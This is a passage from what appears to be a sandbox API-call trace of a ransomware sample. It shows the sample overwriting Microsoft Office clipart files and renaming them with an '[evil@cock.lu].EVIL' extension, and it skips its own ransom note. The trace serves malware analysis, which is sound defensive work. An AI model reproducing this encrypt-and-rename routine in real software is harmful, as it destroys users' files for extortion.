_File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.823] __uncaught_exception () returned 0x84b1160800 [0107.823] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.823] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00965_.wmf.[evil@cock.lu].evil")) returned 1 [0107.824] ??_V@YAXPEAX@Z () returned 0x1 [0107.828] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00965_.WMF", dwFileAttributes=0x200) returned 0 [0107.828] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.828] wcsstr (_Str="AN01039_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.828] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 69 [0107.828] wcscmp (_String1="AN01039_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.828] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01039_.WMF") returned 0x0 [0107.828] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 0x45 [0107.828] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.830] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd10, lpOverlapped=0x0) returned 1 [0107.835] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.835] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.835] _errno () returned 0x84b1160840 [0107.835] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.835] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0107.836] CloseHandle (hObject=0x1a8) returned 1 [0107.836] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.836] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.836] __uncaught_exception () returned 0x84b1160800 [0107.836] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.836] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.[evil@cock.lu].evil")) returned 1 [0107.837] ??_V@YAXPEAX@Z () returned 0x1 [0107.841] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF", dwFileAttributes=0x200) returned 0 [0107.841] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.841] wcsstr (_Str="AN01044_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.841] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 69 [0107.841] wcscmp (_String1="AN01044_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.841] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01044_.WMF") returned 0x0 [0107.841] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 0x45 [0107.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.843] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x63c, lpOverlapped=0x0) returned 1 [0107.848] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.848] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.848] _errno () returned 0x84b1160840 [0107.848] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.848] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x640, lpOverlapped=0x0) returned 1 [0107.848] CloseHandle (hObject=0x1a8) returned 1 [0107.849] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.849] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.849] __uncaught_exception () returned 0x84b1160800 [0107.849] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.849] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01044_.wmf.[evil@cock.lu].evil")) returned 1 [0107.850] ??_V@YAXPEAX@Z () returned 0x1 [0107.854] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01044_.WMF", dwFileAttributes=0x200) returned 0 [0107.854] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.854] wcsstr (_Str="AN01060_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.854] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 69 [0107.854] wcscmp (_String1="AN01060_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.854] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01060_.WMF") returned 0x0 [0107.854] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 0x45 [0107.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.857] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f20, lpOverlapped=0x0) returned 1 [0107.860] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.860] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.860] _errno () returned 0x84b1160840 [0107.860] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.860] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0107.860] CloseHandle (hObject=0x1a8) returned 1 [0107.860] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.861] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.861] __uncaught_exception () returned 0x84b1160800 [0107.861] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.861] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01060_.wmf.[evil@cock.lu].evil")) returned 1 [0107.862] ??_V@YAXPEAX@Z () returned 0x1 [0107.866] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01060_.WMF", dwFileAttributes=0x200) returned 0 [0107.866] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.866] wcsstr (_Str="AN01084_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.866] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 69 [0107.866] wcscmp (_String1="AN01084_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.866] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01084_.WMF") returned 0x0 [0107.866] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 0x45 [0107.866] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.868] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x728, lpOverlapped=0x0) returned 1 [0107.871] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.871] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.872] _errno () returned 0x84b1160840 [0107.872] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.872] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x740, lpOverlapped=0x0) returned 1 [0107.872] CloseHandle (hObject=0x1a8) returned 1 [0107.872] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.873] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.873] __uncaught_exception () returned 0x84b1160800 [0107.873] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.873] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf.[evil@cock.lu].evil")) returned 1 [0107.874] ??_V@YAXPEAX@Z () returned 0x1 [0107.878] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF", dwFileAttributes=0x200) returned 0 [0107.878] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.878] wcsstr (_Str="AN01173_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.878] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 69 [0107.878] wcscmp (_String1="AN01173_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.878] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01173_.WMF") returned 0x0 [0107.878] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 0x45 [0107.878] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.880] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x66dc, lpOverlapped=0x0) returned 1 [0107.883] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.883] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.883] _errno () returned 0x84b1160840 [0107.883] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.884] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x66e0, lpOverlapped=0x0) returned 1 [0107.884] CloseHandle (hObject=0x1a8) returned 1 [0107.884] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.884] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.884] __uncaught_exception () returned 0x84b1160800 [0107.884] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.885] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01173_.wmf.[evil@cock.lu].evil")) returned 1 [0107.885] ??_V@YAXPEAX@Z () returned 0x1 [0107.889] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01173_.WMF", dwFileAttributes=0x200) returned 0 [0107.889] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.889] wcsstr (_Str="AN01174_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.889] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 69 [0107.889] wcscmp (_String1="AN01174_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.889] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01174_.WMF") returned 0x0 [0107.890] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 0x45 [0107.890] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.892] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6cd2, lpOverlapped=0x0) returned 1 [0107.898] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.898] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.898] _errno () returned 0x84b1160840 [0107.898] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.898] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6ce0, lpOverlapped=0x0) returned 1 [0107.898] CloseHandle (hObject=0x1a8) returned 1 [0107.898] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.899] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.899] __uncaught_exception () returned 0x84b1160800 [0107.899] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.899] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf.[evil@cock.lu].evil")) returned 1 [0107.901] ??_V@YAXPEAX@Z () returned 0x1 [0107.905] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF", dwFileAttributes=0x200) returned 0 [0107.905] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.905] wcsstr (_Str="AN01184_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.905] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 69 [0107.905] wcscmp (_String1="AN01184_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.905] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01184_.WMF") returned 0x0 [0107.905] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 0x45 [0107.905] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.907] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xea2, lpOverlapped=0x0) returned 1 [0107.910] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.911] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.911] _errno () returned 0x84b1160840 [0107.911] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.911] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xec0, lpOverlapped=0x0) returned 1 [0107.911] CloseHandle (hObject=0x1a8) returned 1 [0107.911] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.911] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.911] __uncaught_exception () returned 0x84b1160800 [0107.911] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.912] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01184_.wmf.[evil@cock.lu].evil")) returned 1 [0107.912] ??_V@YAXPEAX@Z () returned 0x1 [0107.916] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01184_.WMF", dwFileAttributes=0x200) returned 0 [0107.916] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0107.916] wcsstr (_Str="AN01216_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0107.916] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 69 [0107.916] wcscmp (_String1="AN01216_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0107.916] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AN01216_.WMF") returned 0x0 [0107.916] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 0x45 [0107.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0107.918] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16cc, lpOverlapped=0x0) returned 1 [0107.922] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.922] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0107.922] _errno () returned 0x84b1160840 [0107.922] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.922] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16e0, lpOverlapped=0x0) returned 1 [0107.922] CloseHandle (hObject=0x1a8) returned 1 [0107.922] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0107.923] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0107.923] __uncaught_exception () returned 0x84b1160800 [0107.923] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0107.923] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01216_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft 